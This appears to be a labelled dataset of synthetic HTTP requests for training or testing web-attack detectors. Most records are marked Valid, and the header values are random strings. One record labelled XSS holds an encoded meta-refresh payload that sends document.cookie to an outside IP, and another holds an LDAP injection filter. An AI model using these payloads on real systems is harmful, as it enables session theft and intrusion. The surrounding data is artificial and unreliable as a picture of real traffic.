Content-Encoding: gzip
Content-Location: /rsmag2rr.rar
Content-MD5: bTZlZTJscmg4YXA0dEl2aA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Dec 07 07:12:46 CET
Last-Modified: Thu, 29 Jan 09 07:10:57 CET
Host: www.fynRc.it:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=1
Client-ip: 88.207.186.172
Cookie: h7Oie=64;m58ev=67343;isgRmriwhe=du)e;h6mt=314;5dhGsanlfmzaseP=s-as
Cookie2: $Version="236"
Date: Tue, 07 Sep 04 15:39:33 UTC
ETag: "6vz7sTtTkVMjnt6z"
Expect: 100-continue
From: etjre@ngegAdwy.net
If-Modified-Since: Sun, 04 Jul 04 08:53:54 CET
If-Unmodified-Since: Thu, 19 Jul 07 21:19:40 GMT
If-Match: "c_a3XpOyvViMivE1fh"
If-None-Match: "DKaSgNw0k_BGtb_S"
If-Range: *
Max-Forwards: 822
MIME-Version: 0.7
Pragma: Sdoxa=tNren
Proxy-Authorization: NTLM bmU4RW9kd2dobnNtaXJ0YWNub2dyOW55cm1lUE5kdTFmd2dhbGVIMHZpdDA=
Authorization: Digest nc=2bd10249
Range: 1-587,1-,-06
Referer: /hUaSos6o/ieyl27.aspx
TE: trailers
Trailer: Host
User-Agent: r2ibdyett (tO7fOsM53)
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2293x2568
Via: 9.3 21.243.28.195
Transfer-Encoding: eNrut; eHv3o=tuceeh
Upgrade: aais5e/5.3, eke/9.2, tigCl/6.9
Warning: 865 www.fNat6e.html "Easpea4" 
X-Forwarded-For: 137.37.20.120
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wYsleraeO16Oh9=fPEs&et2axeI=fdferLu@gedsdwinsertgog&EDoFbV=6Q1Rej&ocrlrh= eDe&5flsRkc=ncrlibrl3az7t56&Roetoe=AOtiosOjr&YS6gDyI6K=2&JUsU6xtWzgP=s|@&oierdoam=5or1i&nOvejop3ehhiii=whereOw57includee~ssmte 

End - Id: 7435
Start - Id: 24446
class: Valid
GET /on26asobeaZT/e4U0BHD/15td1s/ci8tsiienhoeit/rDu3hr/csHZ9gree0oesMro/nTthe3eooex/c@ghJnF.asmx?uuoncaeeeht50fk=tha HTTP/1.1
Host: 22.129.109.94:2753
Connection: njdLrn
Accept: image/*;q=0.1, application/*;q=0.8, image/gif;q=0.9
Accept-Charset: windows-1257, iso-8859-6;q=0.4, koi8-r
Accept-Encoding: 
Accept-Language: e-stk, pa-htennay, oaetp-UoteaaI;q=0.6, ateimbi-aePpr8;q=0.4
Cache-Control: max-age=3
Client-ip: 96.17.46.82
Cookie: rBu=muhljbtoretpjsq;blta1=46596795
Cookie2: $Version="454"
Date: Thu, 24 Mar 05 10:55:56 UTC
ETag: "ntPV.2eLArsC@ekPQcyJ"
Expect: Efnggl
From: 5tcAy@3rnhcfaza.cz
If-Modified-Since: Wed, 10 Nov 04 18:45:43 CET
If-Unmodified-Since: Wed, 02 Dec 09 24:34:40 GMT
If-Match: *
If-None-Match: "vVDLhggHF-kJ2gVtys"
If-Range: Fri, 05 Aug 05 13:38:38 CET
Max-Forwards: 202
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic aGVmc2pzaDppeWVwbnM=
Authorization: Digest realm
Range: -78
Referer: /m7rn5eee/shnsn/eorueeh.php
TE: deflate;q=0.3,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.3 (compatible; MSIE 8.8; Open BSD i586; ohe5t; cr5xzsbea; iemstsu)
UA-CPU: MIPS
UA-Disp: 2319,894,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: 3.0 www.ate6O.gif:48
Transfer-Encoding: gzip
Upgrade: I3r8es/8.7
Warning: 755 15.212.165.16 "roet" "Sun, 14 Mar 04 18:26:23 CET"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 782387
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24446
Start - Id: 28451
class: Valid
GET /sehbsz/SnnOP@/cF.kN@d6fk_L/rk2err1Fres/aL01A99Wss/lmeapdjep5lX.nsf? HTTP/1.1
Host: www.gy7uhsu.gov
Connection: eaOrrah1
Accept: */*;q=0.5
Accept-Charset: windows-1254;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: RouEEe-Ibtaan;q=0.4, a-siTU2, e-tamt
Cache-Control: no-cache
Client-ip: 23.125.235.155
Cookie: m4hnnueta=link0Nen)d4ainex;teotWe=98527794;ojuewiboe=|y;EtidatOxrdtw5o=Gptn1dnphly
Cookie2: $Version="3"
Date: Thu, 08 Feb 07 03:30:53 CET
ETag: "4ohLRNGxY-E4_hL"
Expect: 100-continue
From: 3teotee@motpa.ch
If-Modified-Since: Sat, 13 Nov 04 05:01:33 GMT
If-Unmodified-Since: Thu, 03 Sep 09 01:03:00 GMT
If-Match: "mvywnEfVLM58cK2lA"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 0.3
Pragma: 58=tlot
Proxy-Authorization: Digest nonce
Authorization: NTLM b29uY2NoZXRpY3RnZXdlbnljb2lscnZuYnNtZVJ4b2M=
Range: 571439-,36777-,4088-2
Referer: http://www.e1r1.st/eovsosa/ttai.tar.gz
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: TE
User-Agent: axGco.JqHG http://www.a4on.fr
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2738x559
Via: 1.9 81.9.110.208, FTP/1.5 www.n48oil.htm:90957
Transfer-Encoding: compress
Upgrade: 6taars/5.3
Warning: 472 43.150.232.112 "aael8xcny0ewer" 
X-Forwarded-For: 34.125.43.206
X-Serial-Number: 032993654516042
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28451
Start - Id: 14892
class: Valid
GET /radUax9YIHY58/eE/2J0DcQgU9scWQnOur0/2nRg/O7hWOhF4Fcbdrop/-YOtX5wHN8H.gif?ae=tc&hs=kloh&9luwsnec0=oZyM&a1la8eoatfe=sakdbeu%26e3nn&xven=sttouiddiie1d&zhaie=en5hsAh3htmp&@mFQ2OQYL4UV=36442&pP-6VrUQWinsert6=%5C7bs&jlmg=union+%7Ei%29o HTTP/1.1
Host: www.ntYgsrReds.org
Connection: qw3B
Accept: text/plain;q=0.1, application/postscript, video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.5, identity, compress, identity;q=0.9
Accept-Language: H-an2h5h;q=0.0, oorcm-owaA;q=0.9, m2tsn-yxut;q=0.7
Cache-Control: no-transform
Client-ip: 199.117.134.44
Cookie: e6ecolhgtctt=  
Cookie2: $Version="82"
Date: Wed, 21 Dec 05 19:12:57 UTC
ETag: W/"Pbb2bshDLSpjSXa"
Expect: 100-continue
From: lowanht@ceRsaits.it
If-Modified-Since: Mon, 15 Nov 04 02:33:55 UTC
If-Unmodified-Since: Sat, 24 Apr 04 05:03:02 CET
If-Match: *
If-None-Match: "SfPbbTHHyZCGMfxPwIa"
If-Range: "PWYjE3r1mRJsriWKh"
Max-Forwards: 3344
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXhpZXN1ZWdxZXR1OW5lZXJhYWFraVp1dXBzYWhlZG53bGRyb2Zm
Authorization: NTLM Y2llcnNvaXk2b2ZmYjduYm5udEllOHdtZWVVcndoZG9UYWw=
Range: 614-,0-6202
Referer: /43a0delx/ehvar/etso.asp
TE: trailers
Trailer: Cache-Control
User-Agent: e7l0lrig3eHi
UA-CPU: 68000
UA-Disp: 3105,545,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3614x0650
Via: 7.6 www.ltef.png:1, HTTP/8.8 61.152.12.95, FTP/8.8 201.44.234.148
Transfer-Encoding: enoltt; mlDint=nfjssah
Upgrade: lrr/9.4, iau5ot/8.1
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14892
Start - Id: 32595
class: Valid
PUT /5shutdownNnph-i/e0eCenjxxvhoePh/eoouYrpmi/s8BiURxK9tYrRaE/p9pied.msf? HTTP/1.1
Content-Length: 113
Content-Language: tlIn
Content-Encoding: identity
Content-Location: http://www.oLsnc9.de/orahz/d3weesnE/zeso1r.swf
Content-MD5: bThtZm1zM3V0WG5yazVlSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Mar 10 19:38:19 CET
Last-Modified: Thu, 13 May 04 13:49:23 CET
Host: www.wOeetbore.uk:80
Connection: 0e8l
Accept: image/jpeg;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.4, deflate, identity, gzip
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 192.47.129.231
Cookie: ixm0oliose=595
Cookie2: $Version="8"
Date: Tue, 20 Apr 10 23:59:10 UTC
ETag: "lYsE4UvE6HaItzCeVZ"
Expect: hehah=ashmeIup
If-Modified-Since: Sat, 17 Feb 07 18:14:49 UTC
If-Unmodified-Since: Thu, 17 Jul 08 02:14:52 UTC
If-Match: *
If-None-Match: "-.p9qRuJHYTe-fj"
If-Range: Thu, 08 Dec 05 12:20:25 GMT
Max-Forwards: 0
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: ttuo3 keteeat=beezene1
Authorization: Basic bm9ldDplaGRzbzZP
Range: -619576,782-7
Referer: /asTmd/mlto/tzhSeT.msf
TE: chunked;q=0.9
Trailer: Max-Forwards
User-Agent: EtAsu6psh/2.5
UA-CPU: 68000
UA-Disp: 5355,389,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 744x9728
Via: 8.9 15.129.183.72, 1.3 103.146.139.83
Transfer-Encoding: deflate
Upgrade: fim4i/1.8, mvMta/2.8, jo9ve/6.8
Warning: 560 61.58.173.87 "aNahir0tmoon5em" 
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 34552
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

7QJ2Vd@W5.=0kOZn7AX01&eeud=ta&te=laumbtf operlo;<&o94q9UUPXA=aWja0u6ofIcy&ivFTttag=783&WbcP=6&Ycagh4coy=eaile

End - Id: 32595
Start - Id: 17279
class: Valid
GET /i92FpXv/esEisnbe1eq/TrlYt3v.rc66ht@.bin?asa5i29sHkxm=ttlbnt6tufue&@yXhvbscriptuon9P=uC%3CerWk%3AL1%24t&dbhIlcyaGba=ra&tdeeogiee=zna%24HRc&cseWataoP3odnc=cne&mg2netcata1osyJN=8&7nullwinntG=13368239&9s=538989 HTTP/1.0
Host: www.ti5rtSc.uk:47
Connection: close
Accept: application/*;q=0.8
Accept-Charset: euc-kr, iso-8859-6;q=0.6, windows-1257;q=0.3, euc-cn;q=0.9
Accept-Encoding: gzip;q=0.6, deflate;q=0.9, gzip
Accept-Language: *;q=0.6
Cache-Control: max-age=5643
Client-ip: 167.131.62.52
Cookie: 3Hhtpassn=234149;agmailJvbscriptwT=fr;6yOqforms3mochaO=de0y;RxYkBY.6=3;nen709= ebSjeegrt1r
Cookie2: $Version="3"
Date: Fri, 10 Aug 07 05:53:41 GMT
ETag: W/"k8@wlhOkyP1w_dGraS"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Thu, 22 Mar 07 06:12:00 GMT
If-Unmodified-Since: Sun, 14 Sep 08 23:34:00 CET
If-Match: "_dy009E8FMdPvJ6z5c_"
If-None-Match: *
If-Range: Sun, 01 Feb 04 07:40:39 CET
Max-Forwards: 0
MIME-Version: 9.9
Pragma: yw=UOeys
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: NTLM OWV1ZTB0bG9lZW9pZWVlaTdtb3RucnNlOWNuckN3c3Jz
Range: 09626-1394,221800-
Referer: /dUmcqmo/tixcqdeg/tSt44.gif
TE: trailers,gzip;q=0.2
Trailer: Accept-Encoding
User-Agent: Mozilla/6.4 (compatible; aatle9; Win 9x; tRda; cialdisiw; cyERmi6t)
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 552x034
Via: 1.0 173.192.204.138, 3.2 www.0iC2.gif
Transfer-Encoding: deflate
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 768 www.wRlG.js "wpoiorexaw" 
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17279
Start - Id: 27568
class: Valid
GET /wHDcSeWvlB1eJkj/irEorlrb/a8oe/emau2/s@4zYz/@wLjmetaPsg/tvsMtyML/gioce4ac8vmoe/iL6G6VwQ_0FeXabVB8fr/0NUncR7v2wR/xndnhixhnxi/6Gkg.pl?eLttnrnTtAniv9u=msne7&tbc2Ie9pu6yo=etraiiwl&@EyrcpelocationVnph-=bO3ag&mtoyn2iwwTnpit=58&n9sIltdn6ne=awe&m89ooXoi8=ua%3CHr&nog1=n72ab%40 HTTP/1.1
Host: 153.255.206.50
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, identity;q=0.1, compress;q=0.9, deflate, gzip;q=0.3
Accept-Language: rPo-EolUcee;q=0.1, qrn-ttefh, ts-jeaab7yR, sikellf-pUo
Cache-Control: min-fresh=7
Client-ip: 242.247.6.159
Cookie: inrahssaEtuoxl=eax2hqtWsaeu8tbSg;7lq=lv-v;strsth=7
Cookie2: $Version="6"
Date: Sat, 20 Dec 08 09:52:31 GMT
ETag: "7I@X5QIS9AfIHIcSh7UC"
Expect: ruoo5sLm=7puwnt;dkyt
From: nmsse@isns5lO.de
If-Modified-Since: Mon, 04 Jul 05 07:08:11 CET
If-Unmodified-Since: Wed, 01 Feb 06 19:33:25 GMT
If-Match: *
If-None-Match: ".dhagL1w-c8FSUYV"
If-Range: "dcwF364jqM5QStER-G"
Max-Forwards: 8
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: NTLM c2V3ZWEyQWhneDhnZnRWdG80dG9tdG5ycnRldHJtY2VpNw==
Authorization: Basic b3NEdGFhaTpFaGdueW8=
Range: 0-33,159-222311,3856-
Referer: /nt27thet/RfEr/n6rntUv/uebsalz.mpg
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.3 (X11; U; Linux i586 8.1; cN-sn; rv:6.6.3) Gecko/88748653
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4534x344
Via: HTTP/7.6 241.129.162.21
Transfer-Encoding: identity
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 197 179.125.106.204:45943 "tentotelsaAsctyrRtpu" 
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27568
Start - Id: 3956
class: Valid
PUT /lc6omYnblIB-sBBdUps/dsadooe3p6spcey/soatn1n/wuznTIdAhKt7vpcIBs/7B0eJ3wZ_upositionxtermC3/yjJT9dmUXkVXvwmGvL3/ue0enbya/sIo5hRc0nu_3lJ/ti/l@aE.tiff? HTTP/1.0
Content-Length: 27
Content-Language: x,esehrm
Content-Encoding: identity
Content-Location: /we1e9s/adE1nme/aouN4ne/iumemE/eWnn.shtml
Content-MD5: YWJ0cnZ5RWVvOWhqdFRlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Aug 06 08:49:39 GMT
Last-Modified: Tue, 01 Sep 09 03:21:15 GMT
Host: 153.90.217.29
Connection: close
Accept: */*
Accept-Charset: iso-8859-3;q=0.2, x-mac-ce;q=0.7, shift_jis, us-ascii;q=0.3
Accept-Encoding: deflate
Accept-Language: e6-n6flSyh, evWt-iqto, ar-l;q=0.8, ueju-oD;q=0.3
Cache-Control: max-stale=441
Client-ip: 129.13.135.93
Cookie: yeeeho=l0echohTbgsoundpDt
Cookie2: $Version="1"
Date: Sun, 21 Feb 10 11:28:24 CET
ETag: "SNDSKdopQ6lJQ5c-S-"
Expect: 100-continue
From: esmae@enaAeAsai.st
If-Modified-Since: Thu, 14 Dec 06 06:16:55 GMT
If-Unmodified-Since: Thu, 22 Mar 07 06:35:08 GMT
If-Match: *
If-None-Match: "3V6@lu6Q1ZrqcM8jW9b"
If-Range: "mdV@Om2a6qguKGv"
Max-Forwards: 3
MIME-Version: 7.1
Pragma: emt='brmst'
Proxy-Authorization: Digest cnonce="yoehanfr"
Authorization: Basic YXdxczpkYmhqZWk=
Range: 896403-560156,-23134
Referer: http://53awSb.org/titl/heNt/merl.asmx
TE: deflate,trailers
Trailer: Accept
User-Agent: Mozilla/8.8 (X11; U; Solaris 1.5; 8p-sb; rv:4.6.9) Gecko/41371102
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6900x1160
Via: 0.4 204.197.93.74, TayRto/1.0 43.177.159.18
Transfer-Encoding: gzip
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 936 www.tr75t.jpg "uttrnpTleng4ul" 
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 194828763
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

slh=dtten- dbcb/ &Sn=3193

End - Id: 3956
Start - Id: 19407
class: Valid
GET /stS/ehRoeehEisrlonessper/wN1v1nlao/s8M/5SX4oNY.46qPg9mADD/dg3tsosaartenteect/wZi14gCAv48_Uwa/e2DSiUFrMW/Arhiemrailnoi4eEdRk/sO/iQHBOR_O.html? HTTP/1.0
Host: 244.13.224.89
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: macintosh;q=0.9, windows-1255, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 231.68.119.139
Cookie: 3ci=aeceIstyleNp iulsa;dwYuswardtgwr=ceodd5wrlnai;zafrntdtoe2hal=etd/m;u4o04=01;orUThkS8=upnatcnst9sSrl
Cookie2: $Version="3"
Date: Tue, 29 Apr 08 08:06:26 CET
ETag: W/"mIQXWtrwrTIMA@Ij_.r"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Sat, 25 Aug 07 15:35:38 CET
If-Unmodified-Since: Sun, 09 Sep 07 11:35:42 GMT
If-Match: "zPVVb6DxZwNYtEbR-"
If-None-Match: *
If-Range: *
Max-Forwards: 391
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest nc=a68EDdAa
Authorization: Basic Y2RmYXRndHQ6ZWVkdWVz
Range: -6815,05-
Referer: http://oeeTa.uk/noetua8s/orv0cc/te3i.css
TE: chunked
Trailer: Expect
User-Agent: Mozilla/5.4 (X11; U; Unix 3.4; vt-hu; rv:4.6.0) Gecko/20676608
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6070x723
Via: HTTP/8.7 30.147.187.250, 3.9 40.81.18.151:59949
Transfer-Encoding: compress
Upgrade: 0hnhm/0.0
Warning: 515 6.189.134.75 "7iimeytvetemune1t9e" 
X-Forwarded-For: 72.140.87.177
X-Serial-Number: 605477646690730
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 19407
Start - Id: 48105
class: XSS
GET /n./KPP_ZdEncopy1b/iWPc9cdaaaemeeig/pXsNtpb4bJHO9mE@@RB/s3hhOl3aa6oxa/fKI1sn/jerteepsrndeenmajg/hi6xfd/inwUffv.html?Sdult3OwQ0@=4&aclnpigo=e--XE&uGPHT-gq=iEnEdm6Pendq&xerfueP=eGoeWFf7U&ZAaI__qtelnetC=%3Cmeta+++++http-equiv++++%3D++%22+refresh+++%22++content+++%3D++%22+++0%3Burl%3Djavascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F40.147.182.66%2Fntre.msf%27%2Bdocument.cookie%29%3B%5D++%22%3E&ntyssdt2Gqenh=1821689 HTTP/1.1
Host: 27.70.44.2
Connection: 52E9enhT
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: tmtbd-mrwN;q=0.7, tae-aAi, 5-A74i
Cache-Control: no-transform
Client-ip: 44.194.102.2
Cookie: UfEy=lr'6cqzumirsUAa
Cookie2: $Version="6"
Date: Sat, 04 Aug 07 14:00:15 CET
ETag: "QctqqEq0rXpb.PTw"
Expect: 100-continue
From: aIafz@wvamBrQ.uk
If-Modified-Since: Wed, 25 Feb 09 02:10:27 CET
If-Unmodified-Since: Sun, 16 May 04 07:56:14 GMT
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ny9cr sjeOhe=rf9a
Range: -913822,250-
Referer: /lhh8a02w.php
TE: trailers
Trailer: Accept-Charset
User-Agent: gtrgijar1d
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: 1.7 www.ruyxtw.css:88
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48105
Start - Id: 14438
class: Valid
GET /7rFRbgsound/cQmeta8J5Lin/mkMno.SNZlP/stipe6aoyoiAo8ai/otvohi3tmqFeann.swf? HTTP/1.0
Host: www.ntb7tldsyq.uk:4247
Connection: close
Accept: text/*, image/gif
Accept-Charset: windows-1250, ks_c_5601-1987
Accept-Encoding: deflate;q=0.5
Accept-Language: eEzv-nmsm, ipriam-pei5, t-ca6eOe
Cache-Control: max-age=19
Client-ip: 156.3.219.100
Cookie: iNsX7unoab6opl=shfeaoNtijeletdb;iu= i;blCr5sTsr0cl=74;xno=mc;THJt37nH2=8046841530
Cookie2: $Version="52"
Date: Fri, 07 May 04 12:47:00 UTC
ETag: "LP9hdv0ROyxSDSQ0Q"
Expect: Omc9ej=p5xe;wwtSsr=9tcttonf
From: inuozal@th8rsa.cz
If-Modified-Since: Mon, 24 Mar 08 05:07:07 CET
If-Unmodified-Since: Sat, 02 May 09 11:53:58 CET
If-Match: "KYvUG1hk6FXJcZuEIy"
If-None-Match: *
If-Range: *
Max-Forwards: 75
MIME-Version: 3.0
Pragma: w8ba1qa='1rc'
Proxy-Authorization: Basic aHJpVGF0OmR0YXM=
Authorization: Digest nonce
Range: -517,627-,587-701
Referer: http://t2oihofO.it/Alwveq/shDmy.php3
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.7 (X11; U; Linux i586 2.4; rs-Nw; rv:4.2.8) Gecko/12273565
UA-CPU: 68000
UA-Disp: 3006,633,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: HTTP/1.3 www.sodtUad.js
Transfer-Encoding: gzip
Upgrade: swrIch/2.0, cnp/1.4, Ms3ey/4.3, Enm/6.8
Warning: 696 www.x5erorr.gif "amRedorfoi9a" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 716388
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14438
Start - Id: 4513
class: Valid
POST /olGZ8x7Arlz-MS7DR5/r5Xscikcet1nyehlnit/qnLm@vSn2bxh/IePtehe9es41rrjhrj/eo/faOdym4iS6u/oO4NXODkvT0wLG/s@FlAC/tF7fa/saO.shtml? HTTP/1.0
Content-Length: 79
Content-Language: reeye1N,Ehwlh,ld
Content-Encoding: compress
Content-Location: http://www.eiwotci.de/b32i/rnewete5/tNei4.cgi
Content-MD5: ZXBqc0VtZ0ZlWmZ5MVRicw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 May 05 11:48:47 CET
Last-Modified: Sun, 19 Feb 06 23:01:39 CET
Host: www.ede8i.com:80
Connection: e8Sa
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 167.180.186.225
Cookie: niialathf=eelraeoUu0;htrbiheaaai=cdivyrb)3Dtlw;nN0h8hhb0bKp=e6jPwrJA_qG;access_logk3ciSTeDELG=283;sytof3=7346974
Cookie2: $Version="32"
Date: Fri, 03 Mar 06 18:28:40 UTC
ETag: W/"FmO6gXImXaVVwhaW4p6@"
Expect: eaca
From: de2hc@aRyTe.gov
If-Modified-Since: Tue, 23 Mar 10 21:22:09 GMT
If-Unmodified-Since: Wed, 10 Oct 07 18:56:20 UTC
If-Match: "V0TRWSs.NwnusJq"
If-None-Match: *
If-Range: Thu, 07 May 09 10:52:10 UTC
Max-Forwards: 278
MIME-Version: 5.0
Pragma: eufeojsa='aWeiit'
Proxy-Authorization: d6nso iofjtqph=imodlsXg
Authorization: aawcQh naes=aoet
Range: -81622,-19018,7300-85
Referer: /qenzni/aocs3ae/mejeu8.php4
TE: deflate;q=0.2,trailers
Trailer: Trailer
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 7.7; al-u2; rv:6.7.0) Gecko/93627207
UA-CPU: PowerPC
UA-Disp: 9080,142,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 187x310
Via: 2.8 111.109.105.80, HTTP/0.0 www.sft4.png, 5.1 www.7ulq.png
Transfer-Encoding: compress
Upgrade: aensr/9.0, tag/3.6
Warning: 228 118.255.98.255 "tAmnbuea5ieie3sihw" "Tue, 17 Jun 08 12:35:19 CET"
X-Forwarded-For: 165.210.32.151
X-Serial-Number: 94649830551806
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5c=v8B&qKhF1MCMGIq=ed0LMU_h16wL&xrhr0dua=38&iMdieieRv=055734&yad19i=hagzygaohqn

End - Id: 4513
Start - Id: 38558
class: LdapInjection
GET /7g4/oBU3m/vi/inttkhmnehjej/saae1annoiven6Dnda.asp?1bAct6=%29%28+%7C+%28++cn%3D*o+++%27brien*+%29%28mail+%3D*o++%27brien*++%29++ HTTP/1.1
Host: www.snot.de
Connection: nidu5pe
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=87
Client-ip: 40.99.33.206
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="7"
Date: Sun, 04 Sep 05 03:50:55 CET
ETag: W/"@tyb3ncQYBWwihXP"
Expect: elny
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Tue, 08 Apr 08 15:10:53 UTC
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "i-3uQdIjYX_@OZpvIJP"
If-None-Match: "-QTDv4VOhK9LqqzOgu"
If-Range: *
Max-Forwards: 284
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: NTLM eGh3aFRJZDJpdWE5dW1yc29lYW9zbzVoTm94SU5uU2hieWRhZGFuZQ==
Range: -956,35-
Referer: http://tit8eqh.uk/tholef/rsrIl/vf2ft/Rnra/2o59e.gif
TE: gzip
Trailer: Cache-Control
User-Agent: Mozilla/3.0 (compatible; MSIE 3.0; Open BSD i386; xw9ei9; 41lci; 9tewi9)
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/2.9 www.idlwgT.css, HTTP/1.9 www.iungs.htm
Transfer-Encoding: compress
Upgrade: AwoFtN/5.6, vmGs2/6.3, lsee/0.5, mxjple/8.1
Warning: 417 www.racf.css "lane" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38558
Start - Id: 28473
class: Valid
GET /fsrUepRrs/efi9TstAv58ij/yP/8p6pGdD46bdDX/union.X.xhN-oboot.inifJL/ogsyb/0sewb/68THxQtkPtdVG/iap.php3?9b2_q=3&oledgp=uVSOQ.%40qSZK&jRe=a&a3tm=3277&1in=atiQN&b1laLuictinhnk=gaai&I5=6dea8veseaHdere&vteujjouka=1516&ailaeioaea4=ox&rsbaasd=1&Wagl=z6q&hsnriusithnhd=%24Oym&aCr2tnlh=r%24Oe4ilunion&1dtf9noub=Gstyleen HTTP/1.0
Host: 219.107.202.75
Connection: keep-alive
Accept: video/*, video/*;q=0.8
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=8966
Client-ip: 160.213.172.45
Cookie: 6PuttacdRmh=671540;7dBFPM=t
Cookie2: $Version="5"
Date: Wed, 04 Mar 09 23:59:59 CET
ETag: "FtQPPMZUZcIvhY9I6XA-"
Expect: 100-continue
From: zneku@9etnnTes8.it
If-Modified-Since: Sat, 31 Dec 05 16:02:04 CET
If-Unmodified-Since: Thu, 11 Nov 04 01:43:17 UTC
If-Match: "qiRYjB1M535LhuB"
If-None-Match: "R8dtEqeVgsDFay0rZi"
If-Range: *
Max-Forwards: 1303
MIME-Version: 1.7
Pragma: 67intl2=moi2e
